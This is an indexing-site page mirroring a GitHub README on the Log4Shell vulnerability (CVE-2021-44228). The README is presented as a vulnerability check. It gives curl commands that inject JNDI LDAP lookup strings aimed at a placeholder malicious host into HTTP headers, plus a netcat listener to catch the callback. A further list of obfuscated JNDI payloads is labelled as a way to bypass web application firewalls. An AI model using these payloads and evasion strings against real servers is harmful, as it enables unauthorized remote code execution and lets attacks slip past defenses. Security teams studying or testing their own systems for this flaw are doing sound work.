Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/sud0x00/log4j-CVE-2021-44228

CVE-2021-44228
https://github.com/sud0x00/log4j-CVE-2021-44228

cve cve-2021-44228 security

Last synced: about 2 months ago
JSON representation

CVE-2021-44228

Awesome Lists containing this project

README 

        
# log4j-CVE-2021-44228

On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service. The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging library. Log4j is heavily integrated into a broad set of devops frameworks, enterprise IT systems, and vendor software and cloud products.



Execute the following in the malicious remote host to check if your server is vulnerable to Log4j exploit



```curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'```



```nc -lnvp mport```



Other variations which involve a HTTP-POST request can be used to check for vulnerability 



```curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}'  vulnserver:port```



To Bypass webapp firewall 

```

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}

${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}

${jndi:rmi://adsasd.asdasd.asdasd}

${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

```